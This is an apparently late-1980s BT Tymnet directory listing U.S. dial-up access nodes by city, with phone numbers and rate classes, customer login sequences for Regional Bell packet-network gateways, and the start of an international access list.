06350 # PORT ARTHUR TEXAS LOW 409/721-3400
06376 # KISSIMMEE FLORIDA LOW 407/933-8425
06407 # CEDAR RAPIDS IOWA LOW 319/363-7514
06412 # ATHENS GEORGIA LOW 404/548-7006
06421 # LAWRENCE MASSACHUSETTS LOW 508/683-2680
06457 # ANAHEIM/NEWPRT BE CALIFORNIA HIGH 714/852-8141
06462 PERINTON/PITTSFRD NEW YORK HIGH 716/385-5817
06462 PITTSFORD NEW YORK HIGH 716/385-5817
06462 ROCHESTER/PITTSFO NEW YORK HIGH 716/385-5817
06464 # PERINTON/PITTSFOR NEW YORK HIGH 716/385-5710
06464 # PITTSFORD NEW YORK HIGH 716/385-5710
06464 # ROCHESTER/PITTSFO NEW YORK HIGH 716/385-5710
06472 PISCATAWAY NEW JERSEY HIGH 201/562-9700
06501 OKLAHOMA CITY OKLAHOMA HIGH 405/495-8201
06506 + OKLAHOMA CITY OKLAHOMA HIGH 405/787-0684
06507 # OKLAHOMA CITY OKLAHOMA HIGH 405/495-9201
06521 # WHITE PLAINS NEW YORK HIGH 914/761-9590
06522 PAWTUCKET/PROVDEN RHODE ISLAND HIGH 401/273-0200
06522 PROVIDENCE RHODE ISLAND HIGH 401/273-0200
06522 WARWICK/PROVIDENC RHODE ISLAND HIGH 401/273-0200
06525 # NEW ORLEANS LOUISIANA HIGH 504/525-2014
06532 NEW ORLEANS LOUISIANA HIGH 504/522-1370
06544 # PISCATAWAY NEW JERSEY HIGH 201/562-8550
06546 # GARY INDIANA LOW 219/885-0002
06546 # HAMMOND/GARY INDIANA LOW 219/885-0002
06546 # HIGHLAND/GARY INDIANA LOW 219/885-0002
06551 # BELLINGHAM WASHINGTON LOW 206/671-5990
06563 OLYMPIA WASHINGTON LOW 206/943-9050
06564 EVERETT WASHINGTON LOW 206/258-1018
06570 + PITTSBURGH PENNSYLVANIA LOW 412/642-2271
06574 MIAMI FLORIDA HIGH 305/599-2900
06575 # INGLEWOOD CALIFORNIA HIGH 213/587-7514
06575 # LOS ANGELES/VERNO CALIFORNIA HIGH 213/587-7514
06575 # VERNON CALIFORNIA HIGH 213/587-7514
06605 # LOS ALTOS/SAN JOS CALIFORNIA HIGH 408/432-8618
06605 # SAN JOSE CALIFORNIA HIGH 408/432-8618
06605 # SANTA CLARA/SAN J CALIFORNIA HIGH 408/432-8618
06605 # SUNNYVALE/SAN JOS CALIFORNIA HIGH 408/432-8618
06624 # NEW HAVEN/NO. HAV CONNECTICUT MED 203/787-4674
06626 LEXINGTON KENTUCKY MED 606/266-0019
06645 # CHAPEL HILL/DURHA NORTH CAROLINA MED 919/549-9025
06645 # DURHAM NORTH CAROLINA MED 919/549-9025
06651 AURORA/DENVER COLORADO HIGH 303/830-8530
06651 BOULDER/DENVER COLORADO HIGH 303/830-8530
06651 DENVER COLORADO HIGH 303/830-8530
06655 # AURORA/DENVER COLORADO HIGH 303/832-3447
06655 # BOULDER/DENVER COLORADO HIGH 303/832-3447
06655 # DENVER COLORADO HIGH 303/832-3447
06660 ELMIRA NEW YORK LOW 607/737-9065
06674 HOUSTON TEXAS HIGH 713/556-6700
06675 # STATE COLLEGE PENNSYLVANIA LOW 814/234-3853
06704 HOUSTON TEXAS HIGH 713/556-6700
06715 MIDLOTHIAN/RICHMO VIRGINIA MED 804/330-2465
06715 RICHMOND VIRGINIA MED 804/330-2465
06754 # KITCHENER ONTARIO CANL 519/742-7613
06762 # MARQUETTE MICHIGAN LOW 906/228-3780
06770 # FT. LAUDERDALE FLORIDA MED 305/467-1870 06770 # HOLLYWD/FT LDRDL FLORIDA MED 305/467-1870
06770 # PMPN BCH/FT LDRDL FLORIDA MED 305/467-1870
06771 # FT. SMITH ARKANSAS LOW 501/782-2486
06774 # TOPEKA KANSAS LOW 913/234-3070
07001 BOSTON MASSACHUSETTS HIGH 617/439-3400
07001 CAMBRIDGE/BOSTON MASSACHUSETTS HIGH 617/439-3400
07005 DETROIT MICHIGAN HIGH 313/964-1225
07024 # LONGVIEW TEXAS LOW 214/236-7475
07026 # CHARLOTTE NORTH CAROLINA HIGH 704/374-0803
07031 # ALBANY GEORGIA LOW 912/888-9282
07042 # NASHUA NEW HAMPSHIRE MED 603/882-0435
07042 # SALEM/NASHUA NEW HAMPSHIRE MED 603/882-0435
07043 # SARASOTA FLORIDA LOW 813/952-9000
07054 # NEW YORK NEW YORK HIGH 212/809-9660
07061 # NEW YORK NEW YORK HIGH 212/809-9660
07062 # NEW YORK NEW YORK HIGH 212/809-9660
07075 CINCINNATI OHIO HIGH 513/530-9019
07107 BARRE/MONTPELIER VERMONT LOW 802/229-4508
07107 MONTPELIER VERMONT LOW 802/229-4508
07117 # FREMONT CALIFORNIA MED 415/490-7366
07121 # OMAHA NEBRASKA MED 402/393-1305
07124 # BISMARK NORTH DAKOTA LOW 701/255-0869
07126 # ROLLA MISSOURI LOW 314/364-2084
07140 + CINCINNATI OHIO HIGH 513/489-1032
07144 # PORTLAND OREGON HIGH503/222-2151
07145 # PORTLAND OREGON HIGH 503/222-2151
07147 PORTLAND OREGON HIGH 503/222-0900
07150 # BOCA RATON/DELRAY FLORIDA LOW 407/272-7900
07150 # DELRAY FLORIDA LOW 407/272-7900
07154 # GREAT FALLS MONTANA LOW 406/727-9510
07176 SAN JUAN PUERTO RICO INTL 809/725-1882
07176 SAN JUAN PUERTO RICO INTL 809/725-4343
07200 # PUEBLO COLORADO LOW 719/543-9712
07205 LOS ALTOS/SAN JOS CALIFORNIA HIGH 408/432-3430
07205 SAN JOSE CALIFORNIA HIGH 408/432-3430
07205 SANTA CLARA/SAN J CALIFORNIA HIGH 408/432-3430
07205 SUNNYVALE/SAN JOS CALIFORNIA HIGH 408/432-3430
07210 FALL RIVER/SOMERS MASSACHUSETTS LOW 508/676-3087
07210 SOMERSET MASSACHUSETTS LOW 508/676-3087
07214 MIDDLETOWN RHODE ISLAND LOW 401/849-1660
07214 NEWPORT/MIDDLETWN RHODE ISLAND LOW 401/849-1660
07216 # MT. PENN PENNSYLVANIA LOW 215/779-9580
07216 # READING/MT. PENN PENNSYLVANIA LOW 215/779-9580
07217 # GREENSBURG PENNSYLVANIA LOW 412/836-4470
07217 # LATROBE/GREENSBUR PENNSYLVANIA LOW 412/836-4470
07220 BRIDGEPORT CONNECTICUT MED 203/579-1479
07220 STRATFORD/BRIDGEP CONNECTICUT MED 203/579-1479
07223 # DAYTON OHIO MED 513/898-0696
07226 OGDEN UTAH LOW 801/393-5280
07236 # WHITE PLAINS NEW YORK HIGH 914/761-9590
07241 # GREENVILLE NORTH CAROLINA LOW 919/758-0102
07242 # HIGH POINT NORTH CAROLINA LOW 919/883-6121
07243 # PARKERSBURG WEST VIRGINIA LOW 304/485-9470
07264 MIAMI FLORIDA HIGH 305/592-2357
07301 # ROME GEORGIA LOW 404/234-0102
07303 # DANVILLE ILLINOIS LOW 217/442-1452
07305 # KENOSHA WISCONSIN LOW 414/553-9044
07305 # RACINE/KENOSHA WISCONSIN LOW 414/553-9044
07306 # DAVENPORT/RKISLND IOWA MED 309/788-3713
07306 # ROCK ISLAND ILLINOIS MED 309/788-3713
07312 # AGANA HEIGHTS GUAM INTL 671/477-2222
07315 # ABERDEEN MARYLAND LOW 301/273-7100
07316 # WILMINGTON NORTH CAROLINA LOW 919/762-1865
07322 # GREELEY COLORADO LOW 303/352-0960
07331 LEVITTOWN PENNSYLVANIA LOW 215/943-3700
07332 PITTSFIELD MASSACHUSETTS LOW 413/499-0971
07333 # WARREN OHIO LOW 216/392-2542
07336 # ARDMORE OKLAHOMA LOW 405/226-1260
07340 GRAND FORKS NORTH DAKOTA LOW 701/746-0344
07364 # CORNING NEW YORK LOW 607/962-4481
07371 # HUNTINGTON WEST VIRGINIA LOW 304/523-8432
07372 # PETERSBURG VIRGINIA LOW 804/861-1788
07374 # TAUNTON MASSACHUSETTS LOW 508/824-6692
07375 # HANOVER NEW HAMPSHIRE LOW 603/643-4011
07377 # SAN FRANCISCO CALIFORNIA HIGH 415/543-0691
07404 # LONG BEACH CALIFORNIA MED 213/436-6033
07404 # NORWALK/LONG BEAC CALIFORNIA MED 213/436-6033
07404 # SAN PEDRO/LONG BE CALIFORNIA MED 213/436-6033
07413 + NEWARK NEW JERSEY LOW 201/824-4201
07417 SAN FRANCISCO CALIFORNIA HIGH 415/495-7220
07420 # SAN FRANCISCO CALIFORNIA HIGH 415/543-0691
07432 LYNDHURST/UNION C NEW JERSEY HIGH 201/864-8468
07432 UNION CITY NEW JERSEY HIGH 201/864-8468
07434 DAVIS CALIFORNIA LOW 916/758-3551
07434 WOODLAND/DAVIS CALIFORNIA LOW 916/758-3551
07447 # BUTTE MONTANA LOW 406/494-6682
07450 DALLAS TEXAS HIGH 214/637-3012
07454 # TERRE HAUTE INDIANA LOW 812/232-0112
07455 LAFAYETTE INDIANA LOW 317/423-4616
07456 # DUBUQUE IOWA LOW 319/582-3599
07457 # MINOT NORTH DAKOTA LOW 701/839-4210
07460 # BELOIT WISCONSIN LOW 608/362-4655
07460 # JANESVILLE/BELOIT WISCONSIN LOW 608/362-4655
07463 # HOT SPRINGS ARKANSAS LOW 501/623-3576
07464 JONESBORO ARKANSAS LOW 501/935-7957
07465 # CADILLAC MICHIGAN LOW 616/775-9242
07466 # MUSKEGON MICHIGAN LOW 616/739-3453
07467 # PORT HURON MICHIGAN LOW 313/982-0301
07471 # BOWLING GREEN KENTUCKY LOW 502/781-5711
07472 # MANSFIELD OHIO LOW 419/529-3303
07510 ST THOMAS US VIRGIN ISL INTL 809/774-7099
07510 ST THOMAS US VIRGIN ISL INTL 809/776-7084
07511 # DOVER DELAWARE LOW 302/678-9545
07522 # SAN ANGELO TEXAS LOW 915/658-4590
07525 BOSTON MASSACHUSETTS HIGH 617/439-3400
07525 CAMBRIDGE/BOSTON MASSACHUSETTS HIGH 617/439-3400
07533 INGLEWOOD/VERNON CALIFORNIA HIGH 213/588-8128
07533 LOS ANGELES/VERNO CALIFORNIA HIGH 213/588-8128
07533 VERNON CALIFORNIA HIGH 213/588-8128
07540 # CALGARY ALBERTA CANH 403/232-6653
07542 + SACRAMENTO CALIFORNIA LOW 916/442-0992
07571 # SALISBURY MARYLAND LOW 301/860-0480
07607 # GASTONIA NORTH CAROLINA LOW 704/867-2203
07610 LYNN MASSACHUSETTS LOW 617/593-4051
07625 # LOWELL MASSACHUSETTS LOW 508/452-5112
07631 # AUBURN WASHINGTON LOW 206/735-3975
07631 # ENUMCLAW/AUBURN WASHINGTON LOW 206/735-3975
07636 # SANTA FE NEW MEXICO LOW 505/471-0606
07646 # MONROE LOUISIANA LOW 318/388-8810
07650 # KOKOMO INDIANA LOW 317/453-7818
07651 # APPLETON WISCONSIN LOW 414/730-8029
07652 CORONA CALIFORNIA LOW 714/737-5510
07653 # POWAY CALIFORNIA LOW 619/679-0200
07655 # NORRISTOWN PENNSYLVANIA WATS 800/###-####
07656 # NORRISTOWN PENNSYLVANIA WATS 800/###-####
07664 # MADISON WISCONSIN LOW 608/221-0891
07675 DUNDAS ONTARIO CANH 416/628-5908
07675 HAMILTON/DUNDAS ONTARIO CANH 416/628-5908
07676 NEWPORT NEWS VIRGINIA MED 804/596-0898
07677 # FITCHBURG/LEOMINS MASSACHUSETTS LOW 508/537-6451
07677 # LEOMINSTER MASSACHUSETTS LOW 508/537-6451
07706 # MUNCIE INDIANA LOW 317/284-7821
07712 # VERO BEACH FLORIDA LOW 407/569-8207
07714 # MERIDIAN MISSISSIPPI LOW 601/482-4335
07717 # BAYTOWN TEXAS LOW 713/420-3389
07721 # FREEPORT ILLINOIS LOW 815/232-7111
07723 # DOTHAN ALABAMA LOW 205/794-7954
07725 # PANAMA CITY FLORIDA LOW 904/769-0709
07726 # LEAVENWORTH KANSAS LOW 913/651-8094
07730 # SALINA KANSAS LOW 913/825-4845
07731 CICERO/MAYWOOD ILLINOIS LOW 708/345-9100
07731 FOREST PARK/MAYWO ILLINOIS LOW 708/345-9100
07731 MAYWOOD ILLINOIS LOW 708/345-9100
07733 # MARION INDIANA LOW 317/662-1928
07735 ATTLEBORO MASSACHUSETTS LOW 508/226-6441
07736 WOONSOCKET RHODE ISLAND LOW 401/765-5994
07737 # LYNCHBURG VIRGINIA LOW 804/846-0213
07743 HOLYOKE/SPRINGFIE MASSACHUSETTS MED 413/787-0048
07743 SPRINGFIELD MASSACHUSETTS MED 413/787-0048
07747 WILLIAMSPORT PENNSYLVANIA LOW 717/323-0386
07776 MIDLAND TEXAS LOW 915/561-8401
07776 ODESSA/MIDLAND TEXAS LOW 915/561-8401
10021 # HOUSTON TEXAS HIGH 713/496-1332
10027 # KANNAPOLIS NORTH CAROLINA LOW 704/932-4131
10031 # BEDFORD MASSACHUSETTS LOW 617/271-0420
10031 # WOBURN/BEDFORD MASSACHUSETTS LOW 617/271-0420
10034 BALTIMORE MARYLAND HIGH 301/659-7460
10036 # MERCED CALIFORNIA LOW 209/383-7593
10044 # KNOXVILLE TENNESSEE MED 615/693-0498
10061 BUFFALO NEW YORK MED 716/893-1306
10071 YORK PENNSYLVANIA LOW 717/848-9850
10072 # FAIRFIELD CALIFORNIA LOW 707/426-5900
10100 # CORVALLIS OREGON LOW 503/757-6341
10103 ANN ARBOR MICHIGAN MED 313/973-0166
10105 # CAMDEN/PENNSAUKEN NEW JERSEY MED 609/665-5902
10105 # CHERRY HILL/PENNS NEW JERSEY MED 609/665-5902
10105 # PENNSAUKEN NEW JERSEY MED 609/665-5902
10113 # WESTPORT CONNECTICUT MED 203/454-2129
10115 # MIDLOTHIAN/RICHMO VIRGINIA MED 804/330-2673
10115 # RICHMOND VIRGINIA MED 804/330-2673
10122 OTTAWA ONTARIO CANH 613/563-2910
10122 OTTAWA ONTARIO CANH 613/563-2970
10130 # SACRAMENTO CALIFORNIA HIGH 916/447-7434
10133 ATLANTA/DORAVILLE GEORGIA HIGH 404/451-2208
10133 DORAVILLE GEORGIA HIGH 404/451-2208
10133 MARIETTA/DORAVILL GEORGIA HIGH 404/451-2208
10133 NORCROSS/DORAVILL GEORGIA HIGH 404/451-2208
10134 ATLANTA/DORAVILLE GEORGIA HIGH 404/451-2208
10134 DORAVILLE GEORGIA HIGH 404/451-2208
10134 MARIETTA/DORAVILL GEORGIA HIGH 404/451-2208
10134 NORCROSS/DORAVILL GEORGIA HIGH 404/451-2208
10153 + SOUTH BRUNSWICK NEW JERSEY HIGH 609/452-8388
10170 JOHNSTOWN PENNSYLVANIA LOW 814/539-5059
10171 JAMESTOWN NEW YORK LOW 716/488-0794
10172 # SOMERS CONNECTICUT LOW 203/763-3521
10203 # ATLANTA/DORAVILLE GEORGIA HIGH 404/451-3362
10203 # DORAVILLE GEORGIA HIGH 404/451-3362
10203 # MARIETTA/DORAVILL GEORGIA HIGH 404/451-3362
10203 # NORCROSS/DORAVILL GEORGIA HIGH 404/451-3362
10204 # ATLANTA/DORAVILLE GEORGIA HIGH 404/451-3362
10204 # ATLANTA/DORAVILLE GEORGIA HIGH 404/451-3362
10204 # MARIETTA/DORAVILL GEORGIA HIGH 404/451-3362
10204 # NORCROSS/DORAVILL GEORGIA MED 404/451-3362
10212 HAMILTON OHIO LOW 513/874-1744
10213 # OCALA FLORIDA LOW 904/732-3707
10221 # NAPLES FLORIDA LOW 813/434-8080
10233 # CLEVELAND OHIO HIGH 216/861-6709
10244 # ALHAMBRA CALIFORNIA MED 818/308-1994
10244 # ARCADIA/ALHAMBRA CALIFORNIA MED 818/308-1994
10244 # EL MONTE/ALHAMBRA CALIFORNIA MED 818/308-1994
10244 # PASADENA/ALHAMBRA CALIFORNIA MED 818/308-1994
10247 # BRADLEY ILLINOIS LOW 815/935-2352
10247 # KANKAKEE/BRADLEY ILLINOIS LOW 815/935-2352
10254 ATLANTA/DORAVILLE GEORGIA HIGH 404/451-1546
10254 DORAVILLE GEORGIA HIGH 404/451-1546
10254 MARIETTA/DORAVILL GEORGIA HIGH 404/451-1546
10254 NORCROSS/DORAVILL GEORGIA HIGH 404/451-1546
10255 # LAREDO TEXAS LOW 512/727-8308
10256 # HAMPTON VIRGINIA MED 804/727-0572
10261 # SHEBOYGAN WISCONSIN LOW 414/457-6128
10301 # ABILENE TEXAS LOW 915/676-0091
10305 # GADSDEN ALABAMA LOW 205/543-3550
10307 # ANN ARBOR MICHIGAN MED 313/973-7935
10320 # IOWA CITY IOWA LOW 319/354-3633 10325 # INGLEWOOD/VERNON CALIFORNIA HIGH 213/587-7514
10325 # LOS ANGELES/VRN CALIFORNIA HIGH 213/587-7514
10325 # VERNON CALIFORNIA HIGH 213/587-7514
10337 LOUISVILLE KENTUCKY MED 502/499-7110
10346 # NORFOLK VIRGINIA MED 804/857-0148
10346 # PORTSMOUTH/NRFLK VIRGINIA MED 804/857-0148
10346 # VA BCH/NRFLK VIRGINIA MED 804/857-0148
10363 # EL SEGUNDO CALIFORNIA MED 213/643-4228
10363 # MAR VISTA/EL SGND CALIFORNIA MED 213/643-4228
10363 # MARINADELREY/EL S CALIFORNIA MED 213/643-4228
10363 # SANTA MONICA/EL S CALIFORNIA MED 213/643-4228
10432 LANSING ILLINOIS LOW 708/474-1422
10436 # CONCORD/WLNT CRK CALIFORNIA MED `415/935-1507
10436 # PACHECO/WALNT CRK CALIFORNIA MED 415/935-1507
10436 # PLEASNTHILL/WALNT CALIFORNIA MED 415/935-1507
10436 # WALNUT CREEK CALIFORNIA MED 415/935-1507
10464 # QUEBEC CITY QUEBEC CANH 418/647-1116
10470 # ARLINGTON/FORT W TEXAS MED 817/332-9397
10470 # FORT WORTH TEXAS MED 817/332-9397
10471 JOLIET ILLINOIS LOW 815/727-2169
10472 WINDSOR NEW YORK LOW 914/561-9103
10474 # MONTEREY CALIFORNIA LOW 408/375-2644
10506 # JOHNSON CITY TENNESSEE LOW 615/928-9544
10510 # LAFAYETTE LOUISIANA LOW 318/234-8255
10515 # BOSTON MASSACHUSETTS HIGH 617/439-3531
10515 # CAMBRIDGE/BOSTON MASSACHUSETTS HIGH 617/439-3531
10516 # CHARLOTTESVILLE VIRGINIA LOW 804/977-5661
10520 # BOSTON MASSACHUSETTS HIGH 617/439-3531
10520 # cAMBRIDGE/BOSTON MASSACHUSETTS HIGH 617/439-3531
10521 # BOSTON MASSACHUSETTS HIGH 617/439-3531
10521 # CAMBRIDGE/BOSTON MASSACHUSETTS HIGH 617/439-3531
10542 # ALLEN/McKINNEY TEXAS LOW 214/542-2641
10542 # McKINNEY TEXAS LOW 214/542-2641
10543 AKRON OHIO MED 216/376-6227
10546 # AKRON OHIO MED 216/376-8330
10560 # ROCKVILLE MARYLAND LOW 301/869-2700
10561 SAN JOSE CALIFORNIA WATS 800/###-####
10561 SANTA CLARA/SAN CALIFORNIA WATS 800/###-####
10567 # CHAPEL HILL/DURHA NORTH CAROLINA MED 919/549-9025
10567 # DURHAM NORTH CAROLINA MED 919/549-9025
10570 BOZEMAN MONTANA LOW 406/585-9719
10573 MAUI HAWAII LOW 808/242-8411
10574 HILO HAWAII MED 808/935-5717
10601 # AUGUSTA MAINE LOW 207/622-3083
10602 # CAPE GIRARDEAU MISSOURI LOW 314/335-1518
10603 # ELYRIA OHIO LOW 216/324-7156
10604 # FLORENCE SOUTH CAROLINA LOW 803/664-0550
10605 # KINGSTON NEW YORK LOW 914/336-2790
10612 MONTREAL/ST. LAUR QUEBEC CANH 514/747-2996
10612 MONTREAL/ST. LAUR QUEBEC CANH 514/747-1370
10612 VILLE ST. LAURENT QUEBEC CANH 514/747-2996
10612 VILLE ST. LAURENT QUEBEC CANH 514/747-1370
10615 SECANE PENNSYLVANIA LOW 215/543-3045
10617 # E. ST. LOUIS ILLINOIS LOW 618/874-5702
10621 PRINCETON/SO. BRN NEW JERSEY HIGH 609/452-1018
10621 SOUTH BRUNSWICK NEW JERSEY HIGH 609/452-1018
10622 # SOUTH BRUNSWICK NEW JERSEY HIGH 609/452-9529
10622 # SOUTH BRUNSWICK NEW JERSEY HIGH 609/452-9529
10631 HONOLULU HAWAII MED 808/545-7610
10632 # HONOLULU HAWAII MED 808/528-5300
10673 # SPRINGFIELD MISSOURI LOW 417/881-6225
044
11013 # SPRINGFIELD/EUGEN OREGON LOW 503/343-0044
11014 # WACO TEXAS LOW 817/776-0880
11015 # KILLEEN TEXAS LOW 817/526-8118
11016 # SPOKANE WASHINGTON LOW 509/747-3011
11026 # SLIDELL LOUISIANA LOW 504/646-2900
11035 # CLEARWATER FLORIDA MED 813/441-1621
11035 # ST. PETERSBRG/CLR FLORIDA MED 813/441-1621
11052 # EUREKA CALIFORNIA LOW 707/445-3021
11052 # EUREKA CALIFORNIA LOW 707/445-9271
11053 PROVO UTAH LOW 801/373-2192
11063 # CUMBERLAND MARYLAND LOW 301/777-9320
11067 # AUBURN MAINE LOW 207/795-6013
11067 # LEWISTON/AUBURN MAINE LOW 207/795-6013
11120 # EL PASO TEXAS MED 915/533-1453
11121 # EL PASO TEXAS MED 915/533-1453
11123 # BUFFALO NEW YORK MED 716/893-1014
11130 # HOUSTON TEXAS HIGH 713/496-1332
11144 + GRAND RAPIDS MICHIGAN MED 616/458-9252
11150 # CHICAGO ILLINOIS WATS 800/###-####
11151 # CHICAGO ILLINOIS WATS 800/###-####
11152 # CHICAGO ILLINOIS WATS 800/###-####
11161 # WINSTON-SALEM NORTH CAROLINA MED 919/765-1221
11162 # CHARLESTON SOUTH CAROLINA LOW 803/553-0860
11207 # O’FALLON ILLINOIS LOW 618/632-3993
11231 # LANCASTER PENNSYLVANIA LOW 717/569-1081
11236 # LANSING MICHIGAN MED 517/484-5344
11237 # COLUMBIA SOUTH CAROLINA MED 803/252-7375
11240 # GREENVILLE SOUTH CAROLINA MED 803/233-5621
11241 # MOBILE ALABAMA MED 205/460-2515
11242 # LAKE ZURICH/PALAT ILLINOIS LOW 708/991-7171
11242 # PALATINE ILLINOIS LOW 708/991-7171
11251 # DENTON TEXAS LOW 817/565-0552
11252 # VANCOUVER WASHINGTON LOW 206/574-0427
11257 # LITTLE ROCK ARKANSAS MED 501/666-6886
11266 # FORT COLLINS COLORADO LOW 303/224-9819
11267 # AMARILLO TEXAS LOW 806/355-7088
11270 # SAN RAFAEL CALIFORNIA LOW 415/453-2087 11271 # CATHEDRAL CITY CALIFORNIA LOW 619/324-0920
11271 # PALM SPRNGS/CATH CALIFORNIA LOW 619/324-0920
11272 # MOORPARK CALIFORNIA LOW 805/523-0203
11273 # SAN CLEMENTE CALIFORNIA LOW 714/240-9424
11274 # MISHAWAKA/SOUTH B INDIANA MED 219/234-6410
11274 # SOUTH BEND INDIANA MED 219/234-6410
11275 # BRIDGEPORT CONNECTICUT MED 203/332-7256
11276 # SYRACUSE NEW YORK MED 315/433-1593
11300 # TOLEDO OHIO LOW 419/255-7705
11301 ALTOONA PENNSYLVANIA MED 814/946-8639
11301 # HARRISBURG/LEMOYN PENNSYLVANIA MED 717/975-9881
11301 # LEMOYNE PENNSYLVANIA MED 717/975-9881
11304 # NEWARK/WILMINGTON DELAWARE MED 302/652-2036
11304 # WILMINGTON DELAWARE MED 302/652-2036
11305 # LYNDHURST/UNION C NEW JERSEY HIGH 201/864-0995
11305 # UNION CITY NEW JERSEY HIGH 201/864-0995
11306 # HOLYOKE/SPRINGFIE MASSACHUSETTS MED 413/785-1762
11306 # SPRINGFIELD MASSACHUSETTS MED 413/785-1762
11307 # ROCKFORD ILLINOIS MED 815/633-2080
11313 LITTLE ROCK ARKANSAS MED 501/666-6024
11315 # OAKRIDGE TENNESSEE LOW 615/482-1466
11321 # NORTHPORT ALABAMA LOW 205/758-1116
11321 # TUSCALOOSA/NORTHP ALABAMA LOW 205/758-1116
11323 # OWENSBORO KENTUCKY LOW 502/685-0959
11356 # ASHEVILLE NORTH CAROLINA LOW 704/253-8945
11360 # BOULDER CITY NEVADA MED 702/294-0602
11360 # LAS VEGAS/BLDR CI NEVADA MED 702/294-0602
11362 # STAMFORD CONNECTICUT HIGH 203/327-2974
11371 SANTA BARBARA CALIFORNIA MED 805/564-2354
11372 # SANTA BARBARA CALIFORNIA MED 805/965-1612
11402 # MODESTO CALIFORNIA LOW 209/527-0150
11405 # MARLBOROUGH MASSACHUSETTS LOW 508/481-0026
11406 # AUGUSTA/MARTINEZ GEORGIA LOW 404/855-0442
11406 # MARTINEZ GEORGIA LOW 404/855-0442
11417 # PHILADELPHIA PENNSYLVANIA HIGH 215/592-8750
11422 RANDOLPH MASSACHUSETTS LOW 617/986-0500
11451 # BATTLE CREEK MICHIGAN LOW 616/964-9303
11452 # HARRISONBURG VIRGINIA LOW 703/433-6333 11453 # GROTON MASSACHUSETTS LOW 508/448-9361 11663 # ANNAPOLIS MARYLAND LOW 301-224-0520 11671 # ROCHESTER MINNESOTA LOW 507/282-0830 11702 # GEORGETOWN DELAWARE LOW 302/856-1788 11741 # DULUTH MINNESOTA LOW 218/722-0655
11743 # NORTHFIELD ILLINOIS LOW 708/501-4536
11752 # WEST BEND WISCONSIN LOW 414/334-1755
11754 # VICTORIA TEXAS LOW 512/576-9200

TYMNET ACCESS SORTED BY STATE WITHIN REGIONAL BELL OPERATING COMPANY

TYMNET has gateways into many of the Regional Bell Operating Company packet networks. For specifics on how to access these networks, please refer to the information listed at the end of each company section.

07771 RED BANK NEW JERSEY 300/2400 201/758-8000 DN
07771 TOMS RIVER NEW JERSEY 300/2400 201/286-3800 DN
PDN

DN BELL ATLANTIC – NETWORK NAME IS PUBLIC DATA NETWORK (PDN)

(CONNECT MESSAGE)
. _. _. _< _C _R _> _ (SYNCHRONIZES DATA SPEEDS)

WELCOME TO THE BPA/DST PDN

*. _T _ _< _C _R _> _ (TYMNET ADDRESS)

131069 (ADDRESS CONFIRMATION – TYMNET DNIC)
COM (CONFIRMATION OF CALL SET-UP)

-GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES)
—————————————————-
BELL SOUTH

LSK BELLSOUTH – NETWORK NAME IS PULSELINK

(CONNECT MESSAGE)

. _. _. _ _< _C _R _> _ (SYNCHRONIZES DATA SPEEDS)
(DOES NOT ECHO TO THE TERMINAL)
CONNECTED
PULSELINK

1 _3 _1 _0 _6 _ (TYMNET ADDRESS)
(DOES NOT ECHO TO THE TERMINAL)

PULSELINK: CALL CONNECTED TO 1 3106

-GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES)
—————————————————-
PACIFIC BELL

PS PACIFIC BELL – NETWORK NAME IS PUBLIC PACKET SWITCHING (PPS)

(CONNECT MESSAGE)

. _. _. _< _C _R _ (SYNCHRONIZES DATA SPEEDS)>
(DOES NOT ECHO TO THE TERMINAL)

ONLINE 1200
WELCOME TO PPS: 415-XXX-XXXX
1 _3 _1 _0 _6 _9 _ (TYMNET ADDRESS)
(DOES NOT ECHO UNTIL TYMNET RESPONDS)

-GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES)
———————————————————

SOUTHWESTERN BELL
RLK – SOUTHWESTERN BELL TELEPHONE- NETWORK NAME IS MICROLINK II(R)

(CONNECT MESSAGE)
(PLEASE TYPE YOUR TERMINAL IDENTIFIER)

A _ (YOUR TERMINAL IDENTIFIER)

WELCOME TO MICROLINK II
-XXXX:01-030-
PLEASE LOG IN:
.T < _C _R _> _ (USERNAME TO ACCESS TYMNET)

HOST: CALL CONNECTED

-GWY 0XXXX- TYMNET: PLEASE LOG IN:
——————————————————–
SOUTHERN NEW ENGLAND

ONNNET – SOUTHERN NEW ENGLAND TELEPHONE – NETWORK NAME IN CONNNET

(CONNECT MESSAGE)

H_ H_ <_ C_ R_> (SYNCHRONIZES DATA SPEEDS)
(DOES NOT ECHO TO THE TERMINAL)
CONNNET

._ T_ <_ C_ R_>_ (MUST BE CAPITAL LETTERS)

26-SEP-88 18:33 (DATA)
031069 (ADDRESS CONFIRMATION)
COM (CONFIRMATION OF CALL SET-UP)

-GWY OXXXX-TYMNET: PLEASE LOG IN:

——————————————————

BT TYMNET GLOBAL DATA NETWORK (GDN) SERVICES

INTERNATIONAL ACCESS LOCATIONS

The TYMNET Public Network is accessible from most countries throughout the world. In many cities within these countries TYMNET may be accessed with a local phone call. These countries are listed below for your convenience.
TYMNET can also be accessed from most other countries via TYMUSA or Telex. For more complete information about access to TYMNET from international locations, or about access to international locations from TYMNET, consult the Information System or your local BT Tymnet representative or call Customer Information Help Desk at 800/336-0149 or 703/442-0145.

INTERNATIONAL DIRECT DIAL-UP ACCESS

BT Tymnet, in its continuing effort to provide convenient data communications solutions for you, now offers direct dial-up access from international locations.
Users located in the countries listed can access TYMNET, directly, using terminals and/or PCs operating asynchronously.
International Service Requirements

Speed (bps): Modem Type:
300 CCITT V.21
300B Bell 103/113 compatible
1200 CCITT V.22
1200B Bell 212A compatible
2400 CCITT V.22 bis compatible
9600 CCITT V.32 compliant

Notes:
– Trispeed denotes 300B, 1200B, or 2400 capability
– Services fully compliant with BT Tymnet certified modems
– V.42 compatible/MNP Level 2 – 4
– Density classifications (CanH, CanL, 1, 2, 3, 4, 5, E1,
E2, Pacific, *) signify a rate structure different from standard domestic rates.
Please consult the Information System or your local BT Tymnet representative for details.

Access procedures for direct access are identical to domestic access procedures. Please consult the pamphlet “How to Use TYMNET” (Publications #C-001) for more details.
————————————————————

GLOBAL NETWORK SERVICES “GNS” COUNTRIES
Countries With Direct TYMNET Access

Country, Province Access
City Density Number Comments
————————————————————
AUSTRALIA
————————————————————
Melbourne Pacific (3)416-2146 300/1200/2400/mnp
Sydney Pacific (2)290-3400 300/1200/2400/mnp
For BT Tymnet’s Australian Support Center, call: 008-032064
————————————————————
BELGIUM
————————————————————
Brussels E1 (2)640-0215 300
E1 (2)647-1150 1200/2400
Mons E1 (65)36-0051 1200/2400

